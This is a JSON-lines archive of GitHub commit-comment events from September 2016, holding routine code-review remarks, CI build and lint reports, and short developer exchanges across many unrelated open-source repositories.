{"id":"4577086691","type":"CommitCommentEvent","actor":{"login":"handrews"},"repo":{"name":"json-schema-org/json-schema-spec"},"payload":{"comment":{"id":19062278,"position":null,"line":null,"path":null,"commit_id":"de6fa432d3654b5837ac785a66a31b8ad307232d","created_at":"2016-09-17T01:11:19Z","updated_at":"2016-09-17T01:11:19Z","body":"I'm believe that the point of this section was to ensure that keywords can only interact with each other within a single level of schema.  Keywords in parent schemas cannot interact with keywords in child schemas, because that would make the child schema validation context-dependent.\r\n\r\nI think this could be specified more clearly elsewhere in the document."}},"created_at":"2016-09-17T01:11:19Z"}
{"id":"4577088086","type":"CommitCommentEvent","actor":{"login":"JasonGross"},"repo":{"name":"mit-plv/fiat-crypto"},"payload":{"comment":{"id":19062279,"position":28,"line":28,"path":"src/Util/Relations.v","commit_id":"1ea69cd53ff8472bb23c338d0e3fcac0a1f9ada5","created_at":"2016-09-17T01:12:11Z","updated_at":"2016-09-17T01:12:11Z","body":"Does `repeat repeat (assumption||reflexivity||econstructor)` also work?  If so, the answer is \"evar ordering and dependencies\"."}},"created_at":"2016-09-17T01:12:11Z"}
{"id":"4577090085","type":"CommitCommentEvent","actor":{"login":"tyler-sassaman"},"repo":{"name":"dssquared/Networks_Lab1"},"payload":{"comment":{"id":19062282,"position":null,"line":null,"path":null,"commit_id":"7f5b3dc1ba8a89d303ffa5a927903a77492af920","created_at":"2016-09-17T01:13:35Z","updated_at":"2016-09-17T01:13:35Z","body":"I uploaded a file with some chunks of code that are a start at a few things, I am just not sure how to interface them with the rest of the program. I think the easiest way to process a message is to parse the message and call process with only the x and y values. How this would be done I am  not sure. I think a 2d array is the easiest way to maintain the board and issue responses, and for each board query we can just create a new board.txt file from the array."}},"created_at":"2016-09-17T01:13:35Z"}
{"id":"4577090247","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":19062283,"position":null,"line":null,"path":null,"commit_id":"7f2bb3fa47c95008b333c4b8b1d72fd1f12ba1dd","created_at":"2016-09-17T01:13:41Z","updated_at":"2016-09-17T01:13:41Z","body":"Build report #160598469 for sha 7f2bb3fa47c95008b333c4b8b1d72fd1f12ba1dd:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%280/0%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-0.00%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-2%20error%28s%29-yellow.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-1815%20/%208832%20%2820.55%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-0.00%20%25-yellow.svg)](#)\n"}},"created_at":"2016-09-17T01:13:41Z"}
{"id":"4577090874","type":"CommitCommentEvent","actor":{"login":"dodekeract"},"repo":{"name":"joshbuchea/HEAD"},"payload":{"comment":{"id":19062285,"position":null,"line":null,"path":null,"commit_id":"4cd6e5ce9b80dd1b12afadcfbee5f046afeedca7","created_at":"2016-09-17T01:14:05Z","updated_at":"2016-09-17T01:14:05Z","body":"@joshbuchea Don't assume, use the appropriate modifier key to open as new tab."}},"created_at":"2016-09-17T01:14:05Z"}
{"id":"4577100791","type":"CommitCommentEvent","actor":{"login":"mhepner"},"repo":{"name":"mhepner/ExData_Plotting1"},"payload":{"comment":{"id":19062298,"position":null,"line":null,"path":null,"commit_id":"f7d22f7701145716978fe468c7abfd154642efd2","created_at":"2016-09-17T01:20:46Z","updated_at":"2016-09-17T01:20:46Z","body":"Had to delete household_power_consumption.txt file from data directory due to size constraints of GitHub.  (File exceeds 100K)."}},"created_at":"2016-09-17T01:20:46Z"}
{"id":"4577100939","type":"CommitCommentEvent","actor":{"login":"devSparkle"},"repo":{"name":"CLIPStudents/OPOMUN"},"payload":{"comment":{"id":19062300,"position":null,"line":null,"path":null,"commit_id":"03b351831051b3d695ce3194e7a3f0363caab10a","created_at":"2016-09-17T01:20:53Z","updated_at":"2016-09-17T01:20:53Z","body":"Fixed #5 and implemented CoreStyle as mentioned in #3."}},"created_at":"2016-09-17T01:20:53Z"}
{"id":"4577101001","type":"CommitCommentEvent","actor":{"login":"DNx5"},"repo":{"name":"AuthMe/AuthMeReloaded"},"payload":{"comment":{"id":19062301,"position":null,"line":null,"path":null,"commit_id":"c1e90a8faff1b6398efa35f335d3b801099ed26b","created_at":"2016-09-17T01:20:54Z","updated_at":"2016-09-17T01:20:54Z","body":"@ljacqu from the guava java docs for Charsets:\r\n> <p><b>Note for Java 7 and later:</b> this constant should be treated as deprecated; use\r\n [java.nio.charset.StandardCharsets#UTF_8](https://docs.oracle.com/javase/7/docs/api/java/nio/charset/StandardCharsets.html#UTF_8) instead."}},"created_at":"2016-09-17T01:20:54Z"}
{"id":"4577106733","type":"CommitCommentEvent","actor":{"login":"awwright"},"repo":{"name":"json-schema-org/json-schema-spec"},"payload":{"comment":{"id":19062309,"position":null,"line":null,"path":null,"commit_id":"de6fa432d3654b5837ac785a66a31b8ad307232d","created_at":"2016-09-17T01:24:44Z","updated_at":"2016-09-17T01:24:44Z","body":"The section was talking about \"minExclusive\" and \"maxExclusive\", which\ndon't impose any constraints by themselves, but whose value is used for\nevaluating \"minimum\" and \"maximum\" respectively.\n\nBut we can just say that in their respective definitions.\n\nOn Sep 16, 2016 18:11, \"Henry Andrews\" <notifications@github.com> wrote:\n\n> I'm believe that the point of this section was to ensure that keywords can\n> only interact with each other within a single level of schema. Keywords in\n> parent schemas cannot interact with keywords in child schemas, because that\n> would make the child schema validation context-dependent.\n>\n> I think this could be specified more clearly elsewhere in the document.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/json-schema-org/json-schema-spec/commit/de6fa432d3654b5837ac785a66a31b8ad307232d#commitcomment-19062278>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAatDdXf-t8FA8feDpGqlAdjOJKgmLXVks5qqz44gaJpZM4J_eAX>\n> .\n>\n"}},"created_at":"2016-09-17T01:24:44Z"}
{"id":"4577107222","type":"CommitCommentEvent","actor":{"login":"bdharrington7"},"repo":{"name":"NodeBB/nodebb-plugin-composer-default"},"payload":{"comment":{"id":19062310,"position":4,"line":357,"path":"static/less/composer.less","commit_id":"12668aeaab7fbd0bd92327dbc7212e3cc8d932b7","created_at":"2016-09-17T01:25:04Z","updated_at":"2016-09-17T01:25:04Z","body":"Sorry. I tested on Chrome and it looks fine. What browser are you seeing\nthis in?\n\nTo be candid, why is this a blocker, but not the bug that completely\nblocked the submit button on the composer?\nOn Fri, Sep 16, 2016 at 12:34 PM Barış Soner Uşaklı <\nnotifications@github.com> wrote:\n\n> Yeah that's a regression.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/NodeBB/nodebb-plugin-composer-default/commit/12668aeaab7fbd0bd92327dbc7212e3cc8d932b7#commitcomment-19059198>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AEV8Q45viG74_PlvlCcphefn2N7cMHzkks5qqu8_gaJpZM4J_QhL>\n> .\n>\n"}},"created_at":"2016-09-17T01:25:04Z"}
{"id":"4577108097","type":"CommitCommentEvent","actor":{"login":"ThisTestUser"},"repo":{"name":"ThisTestUser/Docs"},"payload":{"comment":{"id":19062314,"position":null,"line":null,"path":null,"commit_id":"ee739e1721641f4655aafd3d0cddd9b7defd69f0","created_at":"2016-09-17T01:25:37Z","updated_at":"2016-09-17T01:25:37Z","body":"@mcccs \r\nGWEN added more things from AAC, such as the Reach check and the Heuristics. (For combat detection only)\r\n"}},"created_at":"2016-09-17T01:25:37Z"}
{"id":"4577115342","type":"CommitCommentEvent","actor":{"login":"ncorai"},"repo":{"name":"ceylon/ceylon-lang.org"},"payload":{"comment":{"id":19062336,"position":277,"line":479,"path":"documentation/1.3/tour/interop.md","commit_id":"6600a62ff4496cf23bd34d5b31f118c14237a402","created_at":"2016-09-17T01:30:48Z","updated_at":"2016-09-17T01:30:48Z","body":"and Java arrays"}},"created_at":"2016-09-17T01:30:48Z"}
{"id":"4577118362","type":"CommitCommentEvent","actor":{"login":"lycium"},"repo":{"name":"thargor6/JWildfire"},"payload":{"comment":{"id":19062342,"position":null,"line":null,"path":null,"commit_id":"ea67255161069877286b850203a9c978ee3c7a3a","created_at":"2016-09-17T01:33:05Z","updated_at":"2016-09-17T01:33:05Z","body":":D"}},"created_at":"2016-09-17T01:33:05Z"}
{"id":"4577119265","type":"CommitCommentEvent","actor":{"login":"fr500"},"repo":{"name":"libretro/RetroArch"},"payload":{"comment":{"id":19062344,"position":null,"line":null,"path":null,"commit_id":"17e78909d51188d3d3469177724e7861c7fade10","created_at":"2016-09-17T01:33:45Z","updated_at":"2016-09-17T01:33:45Z","body":"@twinaphex This commit breaks mouse input in dosbox and makes it wonky in bsnes (can't get to edges, etc)"}},"created_at":"2016-09-17T01:33:45Z"}
{"id":"4577120120","type":"CommitCommentEvent","actor":{"login":"jamessan"},"repo":{"name":"joeyh/github-backup"},"payload":{"comment":{"id":19062346,"position":2,"line":1,"path":"CHANGELOG","commit_id":"4ac8f326f559e91cf43d5c563c734f1b7ade4586","created_at":"2016-09-17T01:34:25Z","updated_at":"2016-09-17T01:34:25Z","body":"I know haskell supports lazy evaluation, but I didn't know that would allow time travel. :)"}},"created_at":"2016-09-17T01:34:25Z"}
{"id":"4577122153","type":"CommitCommentEvent","actor":{"login":"ncorai"},"repo":{"name":"ceylon/ceylon-lang.org"},"payload":{"comment":{"id":19062353,"position":5,"line":78,"path":"blog/2016-09-16-ceylon-1-3-0.md","commit_id":"8ced57ed82d458afd5d319605fcbe226e90b7a3b","created_at":"2016-09-17T01:35:56Z","updated_at":"2016-09-17T01:35:56Z","body":"localhost"}},"created_at":"2016-09-17T01:35:56Z"}
{"id":"4577124593","type":"CommitCommentEvent","actor":{"login":"TimSylvester"},"repo":{"name":"TimSylvester/swaggerwcf"},"payload":{"comment":{"id":19062360,"position":null,"line":null,"path":null,"commit_id":"84082573a9c3ff7182cf2cac6358315d05c61bbe","created_at":"2016-09-17T01:37:51Z","updated_at":"2016-09-17T01:37:51Z","body":"When using WCF, it's sometimes necessary to take over serialization manually.  In such cases, a method may logically return a particular data structure, but the return type in the interface is System.IO.Stream.\r\n\r\nIn addition, a function may support types other than JSON and XML, which are not possible to specify using WebGet/WebInvoke and WebMessageFormat.\r\n\r\nThis change adds two attributes which allow the overriding of a method's return type and content-types."}},"created_at":"2016-09-17T01:37:51Z"}
{"id":"4577125800","type":"CommitCommentEvent","actor":{"login":"irishsailor"},"repo":{"name":"VawkeIO/DungeonRealms"},"payload":{"comment":{"id":19062363,"position":null,"line":null,"path":null,"commit_id":"73a7b71489d3649ebb5a7be163d96a5a8e4da209","created_at":"2016-09-17T01:38:45Z","updated_at":"2016-09-17T01:38:45Z","body":"Matt, did you every make a tutorial?  I'm going to try to check out the code and see if I can get this running but its been awhile since I have done anything like that.  I pretty much just wanna play by myself running around, or have a lan party with some friends that used to play years and years ago.  Feel free to email me at lilirishgamer@yahoo.com if someone wants to explain how run it."}},"created_at":"2016-09-17T01:38:45Z"}
{"id":"4577126958","type":"CommitCommentEvent","actor":{"login":"Zarel"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19062368,"position":51,"line":162,"path":"chat-plugins/info.js","commit_id":"05ae323fcddf97d865ec5e588d8db26e06b04041","created_at":"2016-09-17T01:39:42Z","updated_at":"2016-09-17T01:39:42Z","body":"whoopsie"}},"created_at":"2016-09-17T01:39:42Z"}
{"id":"4577131827","type":"CommitCommentEvent","actor":{"login":"anttis"},"repo":{"name":"anttis/bontho.fi"},"payload":{"comment":{"id":19062374,"position":null,"line":null,"path":null,"commit_id":"a4175fc96ed0cfc2ab7de190dcaa6e77b2a92fb4","created_at":"2016-09-17T01:43:33Z","updated_at":"2016-09-17T01:43:33Z","body":"olen ylpeä tästä commitista."}},"created_at":"2016-09-17T01:43:33Z"}
{"id":"4577131933","type":"CommitCommentEvent","actor":{"login":"TimSylvester"},"repo":{"name":"TimSylvester/swaggerwcf"},"payload":{"comment":{"id":19062375,"position":null,"line":null,"path":null,"commit_id":"84082573a9c3ff7182cf2cac6358315d05c61bbe","created_at":"2016-09-17T01:43:38Z","updated_at":"2016-09-17T01:43:38Z","body":"All copyrights to this code are assigned to the originating project from which it was forked and licensed under the same Apache License version 2.0 used therein."}},"created_at":"2016-09-17T01:43:38Z"}
{"id":"4577135576","type":"CommitCommentEvent","actor":{"login":"ssbn-412-42"},"repo":{"name":"ssbn-412-42/Leaning"},"payload":{"comment":{"id":19062383,"position":null,"line":null,"path":null,"commit_id":"187baf59402139f98605aff7a16d5241e87cca58","created_at":"2016-09-17T01:46:20Z","updated_at":"2016-09-17T01:46:20Z","body":"C语言中自定义头文件、函数、常亮的使用方法"}},"created_at":"2016-09-17T01:46:20Z"}
{"id":"4577138372","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"bryanfry/dsp"},"payload":{"comment":{"id":19062392,"position":null,"line":null,"path":null,"commit_id":"e3caa12d800a17795c772749ebe8b390f17a83b2","created_at":"2016-09-17T01:48:26Z","updated_at":"2016-09-17T01:48:26Z","body":"RE: 05a-python.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @julialintern @galvin-mj\r\n\r\nHello @bryanfry \r\n\r\nExcellent work on these Python problems!\r\n\r\n👍 "}},"created_at":"2016-09-17T01:48:26Z"}
{"id":"4577139375","type":"CommitCommentEvent","actor":{"login":"zzysy1996"},"repo":{"name":"zzysy1996/week5-2"},"payload":{"comment":{"id":19062395,"position":45,"line":45,"path":"week5-2/源.cpp","commit_id":"8557a182cc78a6f6c897bd7a1b35afc98b55d310","created_at":"2016-09-17T01:49:08Z","updated_at":"2016-09-17T01:49:08Z","body":"using namespace std;"}},"created_at":"2016-09-17T01:49:08Z"}
{"id":"4577140492","type":"CommitCommentEvent","actor":{"login":"ariccio"},"repo":{"name":"ariccio/SimpleVisor"},"payload":{"comment":{"id":19062400,"position":49,"line":186,"path":"shvos.c","commit_id":"84c5f91b4c2c86438dfa703f514c5dbf05eddf03","created_at":"2016-09-17T01:49:55Z","updated_at":"2016-09-17T01:49:55Z","body":"Hmm, did you omit the size_t parameter here intentionally? Does C resolve `ShvOsFreeContiguousAlignedMemory( addr, size )` to ``ShvOsFreeContiguousAlignedMemory( addr )` if `ShvOsFreeContiguousAlignedMemory` only accepts one parameter?"}},"created_at":"2016-09-17T01:49:55Z"}
{"id":"4577145123","type":"CommitCommentEvent","actor":{"login":"JonMurphy"},"repo":{"name":"emoncms/graph"},"payload":{"comment":{"id":19062405,"position":null,"line":null,"path":null,"commit_id":"25635447a09ee048f6d87f2d53e148405137efc7","created_at":"2016-09-17T01:53:03Z","updated_at":"2016-09-17T01:53:03Z","body":"I see this same error:\r\nhttps://community.openenergymonitor.org/t/error-on-dashboards/1601?u=jon\r\n\r\n(no experience with phpmyadmin)"}},"created_at":"2016-09-17T01:53:03Z"}
{"id":"4577149290","type":"CommitCommentEvent","actor":{"login":"fzurita"},"repo":{"name":"mupen64plus-ae/mupen64plus-ae"},"payload":{"comment":{"id":19062411,"position":null,"line":null,"path":null,"commit_id":"bbdc3c5e8eaaeb1dd7b29c809b6ab1aeabb1d3a1","created_at":"2016-09-17T01:56:03Z","updated_at":"2016-09-17T01:56:03Z","body":"I'll add it as an alternate but commented out."}},"created_at":"2016-09-17T01:56:03Z"}
{"id":"4577152419","type":"CommitCommentEvent","actor":{"login":"MrJuanVal"},"repo":{"name":"Lunat1q/Catchem-PoGo"},"payload":{"comment":{"id":19062420,"position":116,"line":116,"path":"Translations/Interface/Spanish.json","commit_id":"2966b82f0123e31842a8ad38979076ac02350d0b","created_at":"2016-09-17T01:58:13Z","updated_at":"2016-09-17T01:58:13Z","body":"Missing \" here. "}},"created_at":"2016-09-17T01:58:13Z"}
{"id":"4577703366","type":"CommitCommentEvent","actor":{"login":"chipitsine"},"repo":{"name":"chipitsine/openvpn-build"},"payload":{"comment":{"id":19064207,"position":40,"line":54,"path":"windows-nsis/build-complete","commit_id":"d2fc1604f4e60c2e2811309c7b0d270c4f4aff35","created_at":"2016-09-17T10:00:13Z","updated_at":"2016-09-17T10:00:13Z","body":"sure"}},"created_at":"2016-09-17T10:00:13Z"}
{"id":"4577703805","type":"CommitCommentEvent","actor":{"login":"jojoe77777"},"repo":{"name":"DarkWav/EAC"},"payload":{"comment":{"id":19064208,"position":null,"line":null,"path":null,"commit_id":"549ad808d10c48a92fbf0926b67ca20a03d7d7cb","created_at":"2016-09-17T10:00:26Z","updated_at":"2016-09-17T10:00:26Z","body":"Guess what.\r\n\r\nYou forgot to register events.\r\n\r\n(*uncontrollable laughing in the distance*)"}},"created_at":"2016-09-17T10:00:26Z"}
{"id":"4577704445","type":"CommitCommentEvent","actor":{"login":"pjhjohn"},"repo":{"name":"pjhjohn/festime"},"payload":{"comment":{"id":19064212,"position":10,"line":9,"path":"src/components/CountDown/CountDown.js","commit_id":"8f9618ebc7880f3368d5112d0f14079c9181e3f4","created_at":"2016-09-17T10:00:51Z","updated_at":"2016-09-17T10:00:51Z","body":"변수명은 보통 명사형을 사용하는 편입니다. 굳이 선호한다면 동사 보다는 오히려 형용사형이 좀 더 낫기도 합니다.\r\n`remain`의 명사형은 `remains` - 이지만 여기에서는 key를 가진 object이기 때문에 `remaining`이라는 형용사가 더 좋은 가독성을 줄 것 같습니다.\r\n```\r\nlet remaining = this.getTimeRemaining(festival);\r\nthis.state = {\r\n  days: remaining.days,\r\n  hours: remaining.hours,\r\n  minutes: remaining.minutes,\r\n  seconds: remaining.seconds\r\n};"}},"created_at":"2016-09-17T10:00:51Z"}
{"id":"4577705386","type":"CommitCommentEvent","actor":{"login":"Rayman"},"repo":{"name":"tue-robotics/robot_launch_files"},"payload":{"comment":{"id":19064219,"position":null,"line":null,"path":null,"commit_id":"e1700f3a38644180dc72ec59377b150ac27d3472","created_at":"2016-09-17T10:01:31Z","updated_at":"2016-09-17T10:01:31Z","body":"Ref tue-robotics/hmi#3"}},"created_at":"2016-09-17T10:01:31Z"}
{"id":"4577705492","type":"CommitCommentEvent","actor":{"login":"Rayman"},"repo":{"name":"tue-robotics/robot_skills"},"payload":{"comment":{"id":19064220,"position":null,"line":null,"path":null,"commit_id":"4e4e168efa387af6fbec5df8f815178307c8053a","created_at":"2016-09-17T10:01:37Z","updated_at":"2016-09-17T10:01:37Z","body":"Ref tue-robotics/hmi#3"}},"created_at":"2016-09-17T10:01:37Z"}
{"id":"4577705943","type":"CommitCommentEvent","actor":{"login":"pjhjohn"},"repo":{"name":"pjhjohn/festime"},"payload":{"comment":{"id":19064221,"position":23,"line":16,"path":"src/components/CountDown/CountDown.js","commit_id":"8f9618ebc7880f3368d5112d0f14079c9181e3f4","created_at":"2016-09-17T10:01:59Z","updated_at":"2016-09-17T10:01:59Z","body":"잘 바꿨는데 이거 그냥 너무 궁금해서... `crnt`가 무슨 약자인가요??"}},"created_at":"2016-09-17T10:01:59Z"}
{"id":"4577708580","type":"CommitCommentEvent","actor":{"login":"christian-fei"},"repo":{"name":"tiagomartinho/FastBike"},"payload":{"comment":{"id":19064224,"position":20,"line":20,"path":"FastBike/BikeStationFinder.swift","commit_id":"01efffc5a607f3a9097e17fb31c0037d9b1760f6","created_at":"2016-09-17T10:03:16Z","updated_at":"2016-09-17T10:03:16Z","body":"ƛ😎"}},"created_at":"2016-09-17T10:03:16Z"}
{"id":"4577708882","type":"CommitCommentEvent","actor":{"login":"Vincentsif"},"repo":{"name":"Vincentsif/Processing-Test"},"payload":{"comment":{"id":19064225,"position":16,"line":16,"path":"ContinuousDrawingCircle.pde","commit_id":"236152f49d8dce8f60ea5d8ef2f6d6dbeab46f2e","created_at":"2016-09-17T10:03:31Z","updated_at":"2016-09-17T10:03:31Z","body":"根据不断变化的mouseX与mouseY描绘圆形"}},"created_at":"2016-09-17T10:03:31Z"}
{"id":"4577709155","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.namedfile"},"payload":{"comment":{"id":19064227,"position":null,"line":null,"path":null,"commit_id":"75f46aadbb23a4400b0ce883f11d343d64513714","created_at":"2016-09-17T10:03:47Z","updated_at":"2016-09-17T10:03:47Z","body":"@loechel Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.namedfile/51/violations\n```\nplone/namedfile/file.py:5:1: F401 'StringIO' imported but unused\nplone/namedfile/scaling.py:173:1: C901 'DefaultImageScalingFactory.__call__' is too complex (13)\nplone/namedfile/utils/__init__.py:9:1: F401 'FileUpload' imported but unused\nplone/namedfile/utils/__init__.py:141:13: E265 block comment should start with '# '\nplone/namedfile/utils/__init__.py:144:14: E128 continuation line under-indented for visual indent\nplone/namedfile/utils/__init__.py:159:29: F841 local variable 'e' is assigned to but never used\nplone/namedfile/utils/__init__.py:171:1: C901 'rotate_image' is too complex (17)\nplone/namedfile/utils/__init__.py:233:5: B901 blind except: statement\nplone/namedfile/utils/jpeg_utils.py:0:1: I001 isort found changes, run it on the file\nplone/namedfile/utils/png_utils.py:0:1: I001 isort found changes, run it on the file\nplone/namedfile/utils/png_utils.py:4:1: F401 'StringIO' imported but unused\nplone/namedfile/utils/tiff_utils.py:0:1: I001 isort found changes, run it on the file\nplone/namedfile/utils/tiff_utils.py:34:22: Q000 Remove bad quotes.\nplone/namedfile/utils/tiff_utils.py:37:22: Q000 Remove bad quotes.\nplone/namedfile/utils/tiff_utils.py:40:22: Q000 Remove bad quotes.\nplone/namedfile/utils/tiff_utils.py:72:1: C901 '_translate_field_type' is too complex (13)\nplone/namedfile/utils/tiff_utils.py:97:80: E501 line too long (89 > 79 characters)\nplone/namedfile/utils/tiff_utils.py:99:80: E501 line too long (88 > 79 characters)\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-17T10:03:47Z"}
{"id":"4577709737","type":"CommitCommentEvent","actor":{"login":"fsiamp"},"repo":{"name":"fsiamp/leadtabs"},"payload":{"comment":{"id":19064228,"position":null,"line":null,"path":null,"commit_id":"ce331d6074123b277db97709a10deb6524b2e30e","created_at":"2016-09-17T10:04:14Z","updated_at":"2016-09-17T10:04:14Z","body":"More than 12 fret riffs were added"}},"created_at":"2016-09-17T10:04:14Z"}
{"id":"4577711642","type":"CommitCommentEvent","actor":{"login":"dennwc"},"repo":{"name":"oren/pokemon"},"payload":{"comment":{"id":19064234,"position":24,"line":271,"path":"Readme.md","commit_id":"8dc9c90bad2aa8e1103e1b1a36398f2eff3b3d79","created_at":"2016-09-17T10:05:44Z","updated_at":"2016-09-17T10:05:44Z","body":"`<rdf:type>` should point to an IRI. Thus, it should be `<https://my-domain.com/pokemon>`. Also, some changes from [#475](https://github.com/cayleygraph/cayley/pull/475) will allow you to define a custom prefix for `https://my-domain.com/`, so IRIs might look like `<my:pokemon>` at the end."}},"created_at":"2016-09-17T10:05:44Z"}
{"id":"4577712319","type":"CommitCommentEvent","actor":{"login":"FPtje"},"repo":{"name":"JohnnyCrazy/glua-scrapper"},"payload":{"comment":{"id":19064237,"position":32,"line":32,"path":"glua-scraper/Function.cs","commit_id":"8aa3317b6e12d4a6d32f87288f24389062613d6d","created_at":"2016-09-17T10:06:15Z","updated_at":"2016-09-17T10:06:15Z","body":"Doesn't look right"}},"created_at":"2016-09-17T10:06:15Z"}
{"id":"4577714783","type":"CommitCommentEvent","actor":{"login":"chipitsine"},"repo":{"name":"chipitsine/openvpn-build"},"payload":{"comment":{"id":19064239,"position":40,"line":54,"path":"windows-nsis/build-complete","commit_id":"d2fc1604f4e60c2e2811309c7b0d270c4f4aff35","created_at":"2016-09-17T10:08:14Z","updated_at":"2016-09-17T10:08:14Z","body":"I pushed fixes"}},"created_at":"2016-09-17T10:08:14Z"}
{"id":"4577715007","type":"CommitCommentEvent","actor":{"login":"rduivenvoorde"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19064240,"position":null,"line":null,"path":null,"commit_id":"59583e97deef732f6884a54b518fc34225fd6012","created_at":"2016-09-17T10:08:26Z","updated_at":"2016-09-17T10:08:26Z","body":"thanks @nyalldawson  ! \r\n\r\nthis makes my day \\o/\r\n\r\ncan you please also backport to master_2 ?"}},"created_at":"2016-09-17T10:08:26Z"}
{"id":"4577715157","type":"CommitCommentEvent","actor":{"login":"pjhjohn"},"repo":{"name":"pjhjohn/festime"},"payload":{"comment":{"id":19064241,"position":48,"line":38,"path":"src/components/CountDown/CountDown.js","commit_id":"8f9618ebc7880f3368d5112d0f14079c9181e3f4","created_at":"2016-09-17T10:08:33Z","updated_at":"2016-09-17T10:08:33Z","body":"### Spaces\r\n> `(endtime){` => `(endtime) {`"}},"created_at":"2016-09-17T10:08:33Z"}
{"id":"4577715393","type":"CommitCommentEvent","actor":{"login":"matthiasclasen"},"repo":{"name":"flatpak/flatpak"},"payload":{"comment":{"id":19064242,"position":6,"line":166,"path":"doc/flatpak-build-finish.xml","commit_id":"7de6a33087811298d7d3b9dd56dfc6cde6a0af71","created_at":"2016-09-17T10:08:44Z","updated_at":"2016-09-17T10:08:44Z","body":"Can you put multiple listitems in a varlistentry like that? I would have expected multiple paras in the listitem"}},"created_at":"2016-09-17T10:08:44Z"}
{"id":"4577718421","type":"CommitCommentEvent","actor":{"login":"pjhjohn"},"repo":{"name":"pjhjohn/festime"},"payload":{"comment":{"id":19064246,"position":50,"line":40,"path":"src/components/CountDown/CountDown.js","commit_id":"8f9618ebc7880f3368d5112d0f14079c9181e3f4","created_at":"2016-09-17T10:11:18Z","updated_at":"2016-09-17T10:11:18Z","body":"### Redundent Parenthesis\r\n`%`는 나머지 연산인데, 보통 여타 언어에서는 정수형 연산으로 생각되어집니다. Math.floor는 일종의 casting function이라고 생각해도 되구요. 따라서, \r\n`let seconds = Math.floor( (total/1000) % 60 );`\r\n보다는\r\n`let seconds = Math.floor(total/1000) % 60;`\r\n이 좋지 않을까요?? 제가 모르는 side-effect 가 있을 수도 있으니 만약 그렇다면 이 commit comment에 답장을 부탁드립니다."}},"created_at":"2016-09-17T10:11:18Z"}
{"id":"4577718628","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19064247,"position":null,"line":null,"path":null,"commit_id":"f92ff090099e2a23abe28140f67b8c424c53569e","created_at":"2016-09-17T10:11:27Z","updated_at":"2016-09-17T10:11:27Z","body":"input_processor_refactor (mbadams5) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1784 of 1788 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f92ff090099e2a23abe28140f67b8c424c53569e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f92ff090099e2a23abe28140f67b8c424c53569e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.78%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f92ff090099e2a23abe28140f67b8c424c53569e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.99%25-green.svg)</a>\n"}},"created_at":"2016-09-17T10:11:27Z"}
{"id":"4577719639","type":"CommitCommentEvent","actor":{"login":"dakilangduterte"},"repo":{"name":"CodingRainbow/Rainbow-Code"},"payload":{"comment":{"id":19064251,"position":null,"line":null,"path":null,"commit_id":"ed67a15b886c6ed53c07d5fd2b9bd680031a0578","created_at":"2016-09-17T10:12:19Z","updated_at":"2016-09-17T10:12:19Z","body":"its good!!\r\n"}},"created_at":"2016-09-17T10:12:19Z"}
{"id":"4577720378","type":"CommitCommentEvent","actor":{"login":"JabX"},"repo":{"name":"JabX/autofocus"},"payload":{"comment":{"id":19064252,"position":28,"line":28,"path":"src/router.ts","commit_id":"0469e95f0f44aedf285f7dd152597d7c460765ae","created_at":"2016-09-17T10:12:56Z","updated_at":"2016-09-17T10:12:56Z","body":"C'est une signature d'index, c'est pour dire que tous les propriétés de l'interface doivent être de type `string`. Le nom `key` n'a aucune importance. Voir [ici](http://www.typescriptlang.org/docs/handbook/interfaces.html) au paragraphe \"Indexable types\".\r\n\r\nLa contrainte de `string` est obligatoire puisque dans l'URL on ne peut y mettre que des strings."}},"created_at":"2016-09-17T10:12:56Z"}
{"id":"4577722038","type":"CommitCommentEvent","actor":{"login":"un1versal"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":19064254,"position":null,"line":null,"path":null,"commit_id":"a69dd7d661c0372470c607dfecd69d278e21d802","created_at":"2016-09-17T10:14:19Z","updated_at":"2016-09-17T10:14:19Z","body":"and last but not least the top navigation....\r\nsome should be part of https://github.com/StylishThemes/GitHub-Selected-Tab-Color as well\r\n\r\nand one section is totally unstyled so put on sun glasses... you have been warned.\r\n\r\n![gif](https://cloud.githubusercontent.com/assets/3521959/18607555/c9bc9fe4-7cc7-11e6-98bc-81ee07222076.gif)\r\n"}},"created_at":"2016-09-17T10:14:19Z"}
